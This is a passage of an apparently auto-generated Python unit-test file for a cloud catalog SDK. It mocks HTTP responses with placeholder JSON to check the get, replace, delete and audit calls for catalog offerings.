mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
# Invoke method
response = _service.get_offering(
catalog_identifier,
offering_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_get_offering_value_error(self):
"""
test_get_offering_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"offering_id": offering_id,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.get_offering(**req_copy)
class TestReplaceOffering():
"""
Test Class for replace_offering
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_replace_offering_all_params(self):
"""
replace_offering()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=200)
# Construct a dict representation of a Rating model
rating_model = {}
rating_model['one_star_count'] = 38
rating_model['two_star_count'] = 38
rating_model['three_star_count'] = 38
rating_model['four_star_count'] = 38
# Construct a dict representation of a Feature model
feature_model = {}
feature_model['title'] = 'testString'
feature_model['description'] = 'testString'
# Construct a dict representation of a Configuration model
configuration_model = {}
configuration_model['key'] = 'testString'
configuration_model['type'] = 'testString'
configuration_model['default_value'] = { 'foo': 'bar' }
configuration_model['value_constraint'] = 'testString'
configuration_model['description'] = 'testString'
configuration_model['required'] = True
configuration_model['options'] = [{ 'foo': 'bar' }]
configuration_model['hidden'] = True
# Construct a dict representation of a Validation model
validation_model = {}
validation_model['validated'] = "2019-01-01T12:00:00Z"
validation_model['requested'] = "2019-01-01T12:00:00Z"
validation_model['state'] = 'testString'
validation_model['last_operation'] = 'testString'
validation_model['target'] = {}
# Construct a dict representation of a Resource model
resource_model = {}
resource_model['type'] = 'mem'
resource_model['value'] = { 'foo': 'bar' }
# Construct a dict representation of a Script model
script_model = {}
script_model['instructions'] = 'testString'
script_model['script'] = 'testString'
script_model['script_permission'] = 'testString'
script_model['delete_script'] = 'testString'
script_model['scope'] = 'testString'
# Construct a dict representation of a VersionEntitlement model
version_entitlement_model = {}
version_entitlement_model['provider_name'] = 'testString'
version_entitlement_model['provider_id'] = 'testString'
version_entitlement_model['product_id'] = 'testString'
version_entitlement_model['part_numbers'] = ['testString']
version_entitlement_model['image_repo_name'] = 'testString'
# Construct a dict representation of a License model
license_model = {}
license_model['id'] = 'testString'
license_model['name'] = 'testString'
license_model['type'] = 'testString'
license_model['url'] = 'testString'
license_model['description'] = 'testString'
# Construct a dict representation of a State model
state_model = {}
state_model['current'] = 'testString'
state_model['current_entered'] = "2019-01-01T12:00:00Z"
state_model['pending'] = 'testString'
state_model['pending_requested'] = "2019-01-01T12:00:00Z"
state_model['previous'] = 'testString'
# Construct a dict representation of a Version model
version_model = {}
version_model['id'] = 'testString'
version_model['_rev'] = 'testString'
version_model['crn'] = 'testString'
version_model['version'] = 'testString'
version_model['sha'] = 'testString'
version_model['created'] = "2019-01-01T12:00:00Z"
version_model['updated'] = "2019-01-01T12:00:00Z"
version_model['offering_id'] = 'testString'
version_model['catalog_id'] = 'testString'
version_model['kind_id'] = 'testString'
version_model['tags'] = ['testString']
version_model['repo_url'] = 'testString'
version_model['source_url'] = 'testString'
version_model['tgz_url'] = 'testString'
version_model['configuration'] = [configuration_model]
version_model['metadata'] = {}
version_model['validation'] = validation_model
version_model['required_resources'] = [resource_model]
version_model['single_instance'] = True
version_model['install'] = script_model
version_model['pre_install'] = [script_model]
version_model['entitlement'] = version_entitlement_model
version_model['licenses'] = [license_model]
version_model['image_manifest_url'] = 'testString'
version_model['deprecated'] = True
version_model['package_version'] = 'testString'
version_model['state'] = state_model
version_model['version_locator'] = 'testString'
version_model['console_url'] = 'testString'
version_model['long_description'] = 'testString'
version_model['whitelisted_accounts'] = ['testString']
# Construct a dict representation of a Deployment model
deployment_model = {}
deployment_model['id'] = 'testString'
deployment_model['label'] = 'testString'
deployment_model['name'] = 'testString'
deployment_model['short_description'] = 'testString'
deployment_model['long_description'] = 'testString'
deployment_model['metadata'] = {}
deployment_model['tags'] = ['testString']
deployment_model['created'] = "2019-01-01T12:00:00Z"
deployment_model['updated'] = "2019-01-01T12:00:00Z"
# Construct a dict representation of a Plan model
plan_model = {}
plan_model['id'] = 'testString'
plan_model['label'] = 'testString'
plan_model['name'] = 'testString'
plan_model['short_description'] = 'testString'
plan_model['long_description'] = 'testString'
plan_model['metadata'] = {}
plan_model['tags'] = ['testString']
plan_model['additional_features'] = [feature_model]
plan_model['created'] = "2019-01-01T12:00:00Z"
plan_model['updated'] = "2019-01-01T12:00:00Z"
plan_model['deployments'] = [deployment_model]
# Construct a dict representation of a Kind model
kind_model = {}
kind_model['id'] = 'testString'
kind_model['format_kind'] = 'testString'
kind_model['target_kind'] = 'testString'
kind_model['metadata'] = {}
kind_model['install_description'] = 'testString'
kind_model['tags'] = ['testString']
kind_model['additional_features'] = [feature_model]
kind_model['created'] = "2019-01-01T12:00:00Z"
kind_model['updated'] = "2019-01-01T12:00:00Z"
kind_model['versions'] = [version_model]
kind_model['plans'] = [plan_model]
# Construct a dict representation of a RepoInfo model
repo_info_model = {}
repo_info_model['token'] = 'testString'
repo_info_model['type'] = 'testString'
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
id = 'testString'
rev = 'testString'
url = 'testString'
crn = 'testString'
label = 'testString'
name = 'testString'
offering_icon_url = 'testString'
offering_docs_url = 'testString'
offering_support_url = 'testString'
tags = ['testString']
keywords = ['testString']
rating = rating_model
created = string_to_datetime('2019-01-01T12:00:00.000Z')
updated = string_to_datetime('2019-01-01T12:00:00.000Z')
short_description = 'testString'
long_description = 'testString'
features = [feature_model]
kinds = [kind_model]
permit_request_ibm_public_publish = True
ibm_publish_approved = True
public_publish_approved = True
public_original_crn = 'testString'
publish_public_crn = 'testString'
portal_approval_record = 'testString'
portal_ui_url = 'testString'
catalog_id = 'testString'
catalog_name = 'testString'
metadata = {}
disclaimer = 'testString'
hidden = True
provider = 'testString'
repo_info = repo_info_model
# Invoke method
response = _service.replace_offering(
catalog_identifier,
offering_id,
id=id,
rev=rev,
url=url,
crn=crn,
label=label,
name=name,
offering_icon_url=offering_icon_url,
offering_docs_url=offering_docs_url,
offering_support_url=offering_support_url,
tags=tags,
keywords=keywords,
rating=rating,
created=created,
updated=updated,
short_description=short_description,
long_description=long_description,
features=features,
kinds=kinds,
permit_request_ibm_public_publish=permit_request_ibm_public_publish,
ibm_publish_approved=ibm_publish_approved,
public_publish_approved=public_publish_approved,
public_original_crn=public_original_crn,
publish_public_crn=publish_public_crn,
portal_approval_record=portal_approval_record,
portal_ui_url=portal_ui_url,
catalog_id=catalog_id,
catalog_name=catalog_name,
metadata=metadata,
disclaimer=disclaimer,
hidden=hidden,
provider=provider,
repo_info=repo_info,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['id'] == 'testString'
assert req_body['_rev'] == 'testString'
assert req_body['url'] == 'testString'
assert req_body['crn'] == 'testString'
assert req_body['label'] == 'testString'
assert req_body['name'] == 'testString'
assert req_body['offering_icon_url'] == 'testString'
assert req_body['offering_docs_url'] == 'testString'
assert req_body['offering_support_url'] == 'testString'
assert req_body['tags'] == ['testString']
assert req_body['keywords'] == ['testString']
assert req_body['rating'] == rating_model
assert req_body['created'] == "2019-01-01T12:00:00Z"
assert req_body['updated'] == "2019-01-01T12:00:00Z"
assert req_body['short_description'] == 'testString'
assert req_body['long_description'] == 'testString'
assert req_body['features'] == [feature_model]
assert req_body['kinds'] == [kind_model]
assert req_body['permit_request_ibm_public_publish'] == True
assert req_body['ibm_publish_approved'] == True
assert req_body['public_publish_approved'] == True
assert req_body['public_original_crn'] == 'testString'
assert req_body['publish_public_crn'] == 'testString'
assert req_body['portal_approval_record'] == 'testString'
assert req_body['portal_ui_url'] == 'testString'
assert req_body['catalog_id'] == 'testString'
assert req_body['catalog_name'] == 'testString'
assert req_body['metadata'] == {}
assert req_body['disclaimer'] == 'testString'
assert req_body['hidden'] == True
assert req_body['provider'] == 'testString'
assert req_body['repo_info'] == repo_info_model
@responses.activate
def test_replace_offering_required_params(self):
"""
test_replace_offering_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
# Invoke method
response = _service.replace_offering(
catalog_identifier,
offering_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_replace_offering_value_error(self):
"""
test_replace_offering_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"offering_id": offering_id,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.replace_offering(**req_copy)
class TestDeleteOffering():
"""
Test Class for delete_offering
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_delete_offering_all_params(self):
"""
delete_offering()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString')
responses.add(responses.DELETE,
url,
status=200)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
# Invoke method
response = _service.delete_offering(
catalog_identifier,
offering_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_delete_offering_value_error(self):
"""
test_delete_offering_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString')
responses.add(responses.DELETE,
url,
status=200)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"offering_id": offering_id,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.delete_offering(**req_copy)
class TestGetOfferingAudit():
"""
Test Class for get_offering_audit
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_offering_audit_all_params(self):
"""
get_offering_audit()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/audit')
mock_response = '{"list": [{"id": "id", "created": "2019-01-01T12:00:00.000Z", "change_type": "change_type", "target_type": "target_type", "target_id": "target_id", "who_delegate_email": "who_delegate_email", "message": "message"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
# Invoke method
response = _service.get_offering_audit(
catalog_identifier,
offering_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_get_offering_audit_value_error(self):
"""
test_get_offering_audit_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/audit')
mock_response = '{"list": [{"id": "id", "created": "2019-01-01T12:00:00.000Z", "change_type": "change_type", "target_type": "target_type", "target_id": "target_id", "who_delegate_email": "who_delegate_email", "message": "message"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"offering_id": offering_id,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.get_offering_audit(**req_copy)
class TestReplaceOfferingIcon():
"""
